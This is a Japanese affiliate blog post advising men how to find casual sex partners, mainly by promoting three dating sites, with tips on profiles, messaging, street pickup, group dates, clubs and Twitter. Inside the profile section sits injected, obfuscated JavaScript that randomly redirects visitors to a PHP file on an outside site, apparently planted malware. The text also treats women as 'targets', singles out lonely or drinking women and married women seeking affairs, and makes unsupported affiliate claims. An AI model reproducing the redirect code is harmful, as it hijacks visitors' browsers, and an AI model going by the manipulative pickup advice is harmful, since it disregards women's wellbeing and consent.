セフレを探す方法とは?おすすめの方法と4つのポイントを紹介

  • このエントリーをはてなブックマークに追加
  • Pocket

みなさんの周りには、イケメンでも金持ちでもないのにセフレがいる男っていませんか?彼らは一体どこでセフレを見つけているんでしょうか。

実は僕もイケメンでもなく肩書きもないのに、常にセフレがいる男の1人です。正確に言うと、セフレが欲しすぎていろいろな方法を試しまくった結果、最近では割と簡単にセフレが作れるようになりました。

この記事を読んでくれているみなさんにだけ、僕がここまで培ってきたセフレを探すノウハウをお伝えします。

結論から言うと、闇雲に探すだけではセフレは絶対できません。圧倒的に効率が良く合理的な方法があるので、ここで紹介する方法を実践して、可愛いセフレをGETしてくださいね!

セフレを探す時おすすめの方法は「出会いサイト」を使うこと

本当はもっともったいぶりたいところですが、セフレ作りの中でも一番効率の良い方法を最初にお教えしちゃいます。

色々なセフレの探し方がありますが、コスパが良く手間もかからないのは「出会い系サイト」を使う方法です。

「出会い系で本当に出会えるの?」「お金がかかるんじゃないの?」そう疑問に思う方も中にはいるかもしれませんが、僕が実践してきた中では、確実にコスパも成功率も高いと言えます。

まずはその理由を紹介していきましょう。

他の探し方に比べて低コスト

まずはシンプルに、経済的なコスパがいいと言えます。出会い系サイトは無料では出会えないので、サイト内での課金することになります。その課金に抵抗がある人が多いでしょう。

ですが、よく考えてください。女の子と出会いたい場合、合コンに行けばいくらかかりますか?街コンなら?相席居酒屋なら?

この辺りでのセフレ探しについては後述しますが、だいたい6,000円〜7,000円ほどかかるでしょう。対して出会い系サイトでは、慣れてしまえば3,000円〜4,000円の課金のみで女の子と出会えます。

出会った女の子をセフレにするためには、出会った後にもコストがかかりますよね。なので、女の子との出会いにかけるコストはなるべく減らせた方がいいです。

出会いを求めている女の子が登録しているから

出会い系サイトでは、女の子たちが男との出会いを求めて登録しています。だから、出会ってからセックスまで持ち込める確率が断然高い。

2人だけでのやりとりから始まって、2人だけで会うことになるので、セックスへのハードルは低くなっています。合コンでは友達もその場にいるし、そこまで出会いを求めてない子も来ています。

また、忙しくて出会いのない女の子たちが登録しているのも、出会い系サイトの特徴です。合コンや街コンにわざわざ出かけるのは大変だし時間もない、だけど出会いは欲しい、という女の子たちに人気なのです。

そして最近の若い女の子たちは、ネットで出会うことに抵抗がありません。なので出会い系で出会っても、高い確率で2人で食事やデートに行けるんです。

使うサイトさえ間違えなければ、セフレは必ずできると言っていいでしょう。

共通の知り合いがいないので気軽に出会える

また、出会い系サイトを使って出会う場合、基本的に知り合いなどにはバレません。特に人妻は旦那にバレることを恐れているので、出会い系サイトを使っていることが多いです。

もし、不倫相手が旦那も知っているような共通の知人だったら、バレる恐れも高いでしょう。「バレるかも」という不安にヒヤヒヤしながら、出会いを求めようと思わないでしょう。

出会い系サイトでは、旦那や知人にバレる可能性はかなり少なく、共通の知り合もいないので、気軽に出会いを求めて登録できます。

だから、旦那とセックスレスになっている人妻や、毎日退屈している主婦が、若い女の子同様に多く登録しています。

出会い系に登録している人妻の場合も目的がはっきりしているので、出会ってからベッドまでのハードルはかなり低いですよ。

おすすめの出会い系サイト3選

世の中には、悪質なサイトや出会えないサイトもたくさん存在します。悪質なサイトでいくら頑張ってもセフレはできないので、きちんと出会える優良サイトを選んで使うことが最も重要です。

そこでみなさんに、ちゃんと出会える優良サイト3つを紹介します。実際に僕がセフレをGETしているサイトなので、間違いなくおすすめできるし、効率の良いサイトになります。ぜひ登録して使ってみてください。

1.PCMAX

まず紹介するのは「PCMAX」です。有名なので名前を聞いたことがある人は多いでしょう。

PCMAXの良いところは老舗の安心感です。創業が15年以上も前で、ここまで運営が続いているのはしっかりとした基盤があるからです。

運営がいい加減なサイトや、悪徳な出会い系では15年も続きませんからね。15年間会員数を伸ばし続け、累計会員1000万人を越えた優良サイトです。

実際僕もまったく怪しいところなく使えるので、安心して使える優良サイトと言えます。アクティブ会員に、20代を中心とする若い女の子が多いのも特徴です。

しかも、婚活などの恋愛ガチ勢ではなく、ライトな出会いを求めている女の子の方が多いので、セフレ探しにはうってつけです。

PCMAXへ無料登録はこちら(R18)

PCMAXでセフレを作るポイントをまとめた記事もあります。合わせて読むとPCMAXでセフレを作る詳細な方法が学べます。

2.ハッピーメール

次にご紹介するのは「ハッピーメール」です。これも、創業20年のサイトなので有名です。

ハッピーメールは若い人たちを中心に人気がとても高く、累計会員数はなんと2,000万人を越えているます。会員数がこれだけ多いので、実際いつログインしても、話せる女の子がけっこういます。

人が多いと、好みの女の子も見つけやすいですね。ハッピーメールのすごい点は、通常のサイト内での出会いだけでなく、リアルな出会いのパーティを開いたり、24時間365日対応のサポートがついているところです。安心して、よりたくさんの人に出会ってもらおうという工夫がすごいです。

婚活アプリと違って、多くの女の子は気軽な出会いに使っているのでセフレ探し向きです。きっと、女の子が気軽に登録できる工夫もしているから、これだけ会員数が伸びているのでしょう。

ハッピーメールへの無料登録はこちら(R18)

ハッピーメールでセフレを作るポイントをまとめた記事もあります。合わせて読むとより理解が深まるので、どうぞ。

3.YYC

そして最後に紹介するのが「YYC」です。これも、出会いに飢えているみなさんなら聞いたことがあるでしょう。

運営は、株式会社Diverseという大手上場企業ミクシィの子会社がしています。大手上場企業の子会社が運営しているため、信頼、しっかりしたサポート体制など使うにあたっての安心感があります。

また、マッチングアプリ市場において国内ダウンロード数がNo.1の出会い系です(2016年2月調査)。僕もアプリでダウンロードしたのが始めたきっかけです。

アプリで普及しているだけあって、気軽にダウンロードできるからか、なんと毎日4,000人が新規登録しているとのこと。累計会員は1,400万人を突破しています。

またアプリと若者の親和性が高いからでしょう、こちらもライトな出会い中心の若い女の子が多いです。

YYCも24時間サポート、個人情報保護徹底を謳っているだけあり、安心な出会いに力を入れた出会い系です。

YYCへの無料登録はこちら(R18)

出会い系サイトを使ってセフレを探す時の4つのポイント

紹介したように、セフレ探しに向いているのは、婚活特化型のサイトではなく、若い女の子の登録が多くてライトな出会いに使われる出会い系サイトです。

ここからは、上でご紹介した3つのサイトを使ってセフレを探すときのポイントを紹介していきます。

たとえ優良で女の子と出会いやすいサイトを使っていても、闇雲に使っているのと、きちんと戦略を立てて使っているのとでは、出会える確率は大きく変わります。

ここからは、優良サイトを最大限活かすためのポイントを4つに絞って紹介します。

出会い系サイトからセフレを作る方法を詳しく紹介している記事もあります。合わせて読むとより理解が深まるのでどうぞ。

1.プロフィールを作り込む

$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokonobonnoImg.jpg” alt=”” />

まず何よりも大事なのは、プロフィールをきちんと作ることです。

メッセージを受け取った女の子がまず見るのはプロフィールで、あなたの「顔」のようなものだからです。プロフィールが空欄だらけで興味を持たれなければ、その時点で対象外になる可能性が高いです。

就活で例えると、「履歴書」や「職務経歴書」のようなものですね。プロフィールを作り込むことで、人柄がイメージしやすくなるので、やりとりする女の子に「安心感」や「信頼」を与えることができます。

そのために、まず重要なのはアイコンの写真です。顔のアップでなくてもいいので、「さわやかな印象を与える」写真をアイコンにしましょう。そして、メインの写真のみではなく、複数枚写真をアップすることで、どんな人間なのかをよりイメージすることができ、安心感を与えられます。

そして「自己紹介文」には、仕事内容、趣味、休日の過ごし方、今したいハマっていること、は必ず書くようにしてください。下に例文をあげておくので参考にしてください。

自己紹介文の例
IT関係の仕事をしています。
趣味はスポーツや音楽鑑賞で、休日を利用して仲間たちとフットサルをするのが楽しみです。
最近はライブに行くことにもハマっていて、いろんなアーティストのライブに行ったりフェスに行っているので、一緒に行ってくださる方がいれば嬉しいです!

2.検索機能を活用する

それぞれの出会い系サイトには検索機能が付いていて、出会いたいタイプの女の子を見つけやすくなっています。項目から検索したり、キーワードを入力し一致する相手を検索したりできる機能です。

これをうまく利用して、セフレになりやすそうな女の子を探しましょう。いくら見た目がタイプでも、セフレになりにくいタイプの女の子ばかりにアプローチしていては、時間とポイントを費やすばかりです。

効率よくセフレを作るには、ターゲットを見定めることが重要です。

検索するキーワードをいろいろ試してみてください。職業で検索をかけるときは「看護師」「保育士」「医療関係」「美容関係」「アパレル」が、セフレになりやすい女の子が多い職業としてオススメですよ。

セフレになりやすい女の子の特徴をまとめた記事、なりやすい職業をまとめた記事もあります。合わせて読むとより「セフレ作り」について、詳しくなれます。ぜひどうぞ。


3.掲示板は使わない

それぞれの出会い系サイトには「掲示板」が用意されていて、募集や呼びかけを書き込むことができるようになっています。

でもこれは使わないでください。というのも、掲示板に書き込んでいる女の子は「援デリ業者」「割り切り女」のどちらかの場合が多いからです。

援デリ業者とは、援助交際のフリをしたデリバリーヘルスです。お金が欲しくてセックスを対価にしても良い女の子と、素人とセックスしたい男をつなぐ業者が、素人のフリをして掲示板に書き込んでいます。

このような業者や割り切り素人との援助交際では、20,000円〜30,000円を要求されます。

援デリ業者にしろ割り切り女にせよ、目的はお金なので、セフレ探しには関係のないです。女の子を探す場合は、掲示板よりも先ほど紹介した検索機能が効率的です。

4.気に入った子にはメッセージを送る

検索機能でターゲットとなる女の子を見つけたら、メッセージを送ってアプローチします。気に入った女の子には、迷わずたくさんメッセージを送ってください。

出会い系サイトは「数撃ちゃ当たる作戦」が基本的な攻略法になります。現実の世界で周りの女の子を手当たり次第デートに誘っていたら問題になりますが、出会い系サイトでは、噂にもならなければチャラ男とも思われません。

たくさんの女の子にアプローチして、タイミングや好みが自分に引っかかる女の子の出現を待ちましょう。

メッセージは、会話が続けやすい内容を意識して送りましょう。つまり相手が返信しやすいメッセージです。相手のプロフィールの内容に触れたり、答えやすい質問をしてやりとりしていきましょう。

例えば下の例文のように、相手が興味あることに関する質問をすると、返信率がすごく上がるので参考にしてください。

初めてのメッセージの例文
はじめまして!○○○(アーティスト)いいですよね!
実は僕もちょうど最近いいなと思っていろいろ聴き始めているところだったので、話が合いそうだなと思ってメッセージしてみました!
××さんがよく聞く曲とか、オススメの曲はありますか?!

出会い系サイトを使う以外のセフレの探し方6選

ここでは、出会い系サイト以外のセフレ探しの方法も紹介しておきます。

最も効率が良いおすすめの方法は出会い系サイトですが、それ以外の色々な方法に挑戦してみることも同時におすすめします。

それによって、女の子の扱い方やアプローチの仕方の勉強になるし、成功すれば自信がつくからです。そうなれば、可愛いセフレをGETできる確率が上がりますからね。

もちろん難易度は出会い系に比べて高くなりますが、コツを知っているに越したことはありません。

1.ナンパで出会う

まずは、ストリートナンパで女の子と出会う方法です。

ナンパしたとか、されたという話は時々聞きますが、実際の難易度はけっこう高く根気が必要です。実際、何十人、何百人と声をかけまくって少し話を聞いてくれるかな?というレベル。話すら聞いてもらえずにガン無視されるケースがほとんどですね。

重要なのは、「この人といれば楽しそう」と思わせることです。最初の声かけでついてくる女の子は、少なからずこちらに興味を持っているので、あとは普通に楽しく会話できればOK。

具体的な注意点としては、「人が少ない場所での声かけは警戒心が強まるので、人通りの多い場所を狙う」「2人組の女の子の場合は、主導権を握っている方を落とす」です。

女の子が2人組の場合はそもそも難易度が上がるので、さらにスキルが必要です。コミュニケーション能力に自信がある人にはおすすめの出会い方です。ぜひ挑戦してみましょう。

ナンパした子をセフレをする方法をまとめた記事もあります。合わせて読むとより理解が深まるのでどうぞ。

2.合コンで出会う

次に、合コンで出会った子をセフレにする方法です。これにも少しコツが要ります。

合コンではまず、セフレになりやすいタイプの女の子にターゲットを絞ることが大切です。「お酒が好きな子」「下ネタに抵抗がない子」「寂しがりやな子」などはセフレにしやすいですね。

そしてポイントは、「合コンからすぐお持ち帰りしない」ことです。その場の勢いで持ち帰られた女の子は、その後冷静になり、後悔することが多いです。

特に合コンでは、一緒に参加していた友達がどう思ったかも気にしてしまいます。セフレになるためには、安心感や気楽にいられるような関係が大事なので、2人で会った時にアプローチするようにしましょう。

合コン中は清潔感のある明るいキャラに徹し、チャラくなりすぎないよう注意しましょう。また、合コン後はあまり日にちを空けずに2人で会い、初セックス後もあまり時間を置かない方がよいです。

しっかりとコツを抑えれば、セフレにできる確率は上がります。合コンからセフレを作る方法を詳しく紹介した記事もあります。合コンの予定がある人はぜひチェックしてください。

3.街コンで出会う

そして、街コンも出会いの場として定着してきていますね。

まずは合コン同様、セフレになりやすそうな子を見極めて、ターゲットを絞ってください。そして、適度に自己開示したり質問して会話を楽しませましょう。

最近は「趣味コン」などと呼ばれる、趣味を通じて集まる街コンが主流になっています。会話が盛り上がりやすいですし、気が合う子も見つけやすいですね。

合コンと違う点は、移動や2次会で別の男とも話す機会があることです。ターゲットの女の子と連絡先を交換したら、席を移動するタイミングで連絡をして、印象を強めておきます。

もし女の子が2次会に行くなら自分も参加し、行かないなら2人での飲みに誘います。もし飲みに応じてくれれば可能性は大ですが、ここも合コンの時と同様、その日のうちにセックスしようとしないことがセフレ作りのポイントとなります。

その日楽しく飲むことができたら、あまり日にちを空けずに次のお誘いをしましょう。この誘いに応じてくれれば、少なくとも脈なしではないと考えられるので、思い切ってアプローチしましょう。

セックスすることができたら、これもまた日にちを空けずに次のセックスをすることで、セフレにできる確率は高まります。

街コンからセフレを作る方法をまとめた記事もあります。合わせて読むとより理解が深まるので、どうぞ。

4.クラブで出会う

クラブでの男女の出会いも、昔から定番ですね。

ある調査によれば、クラブへ行く人の男女比は、男性39%、女性61%となっており、女の子の方が多いんです。男からしてみれば、買い手市場というわけです。

実際にクラブへ行ったことがある男のうち、クラブナンパからセフレを作れた人の割合は12.8%。これを多いととるか少ないととるかはあなた次第ですが、クラブでのナンパにもコツとスキルが要ります。

まずは、とにかく声をかけてみる度胸。これがないと始まりません。そして、面白いと思わせるトーク力です。女の子は、クラブでは何人もの男性に声をかけられているはずです。

みんなと同じ当たり障りのない会話では、よっぽどイケメンじゃない限り難しいですよね。クラブなので、泥酔しない程度にお酒の力を借りることも重要になります。

クラブでナンパしてセフレを作る方法を紹介している記事もあります。クラブによく行く人はぜひ読んでみてください。

5.相席居酒屋で出会う

相席居酒屋も、最近では一般的な出会いの場になってきていますよね。

特に近頃の相席居酒屋は、料理やシステムなど、女の子が来やすいように工夫しているので、女の子が集まりやすいです。

そして、真面目に出会いを求めて来ている女の子は少なく、どちらかというと軽い気持ちで来ている子が多いので、戦略的にアプローチすればその日にセックスできることもあります。

多くの相席居酒屋は1人での入店を断っているところが多いので、誰と行くのか、そしてその相方とうまく連携できるか、が重要になってきます。

お互いターゲットを絞って連携し、その場を楽しませて連絡先を交換しましょう。特に2人組の女の子は、相方を気にしてその場で男とは抜け出しにくいので、連絡先を交換し、その後間を空けずに誘うというのがうまくいくパターンですね。

相席居酒屋でセフレを作る方法をまとめた記事もあります。合わせて読むとより理解が深まるので、どうぞ。

6.SNSで出会う

そして最近では、SNSを使って出会うことも珍しくなくなってきました。

日本でユーザーが多いSNSは、Facebook、Instagram、Twitterです。Facebookは実名利用がメイン、Instagtramは写真の投稿がメインで交流しにくいので、この中ではTwitterが一番おすすめですね。

匿名で使えて、知らないアカウントとも交流しやすいです。とはいっても、出会い目的ではない女の子ユーザーが大半なので、簡単には攻略できません。

まずは気になる子にいいねやリツイートを繰り返して認識してもらい、自分のツイートでも興味を引きます。この時のツイートにセンスがあれば、話してみたいと思ってもらいやすいですね。

リプライなどのやりとりで好感触を得たら、DMで個人的にアプローチしていきます。

出会い目的だとわかると引いてしまう子が多いので、男のアカウントとも仲良くし、ちょっとずつ興味を引く必要があります。時間もかかるので根気も大事です。

Twitterでセフレを作る方法をまとめた記事もあります。ぜひ合わせて読んでみてください。

自分にあった探し方を見つけて可愛いセフレをGETしよう

いかがだったでしょうか?

様々な方法を紹介しましたが、自分にあったセフレの探し方を見つけて、何回も繰り返すことでコツを掴めば、セフレGETの成功率があがります。

成功率が上がれば男として自信ができます。自信がある男はモテるので、また可愛いセフレができます。最初に根気よく努力を続けることで、このように良い連鎖が生まれ、好循環に入ることができます。

諦めずに挑戦し続けることが、成功への近道です。そして、ただ闇雲に挑戦するだけではなく、効率の良い方法に絞って、スキルを身につける努力をしていきましょう。

この記事を最後まで読んでくれたみなさんに、可愛くてエロいセフレができることを陰ながら応援しています!

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。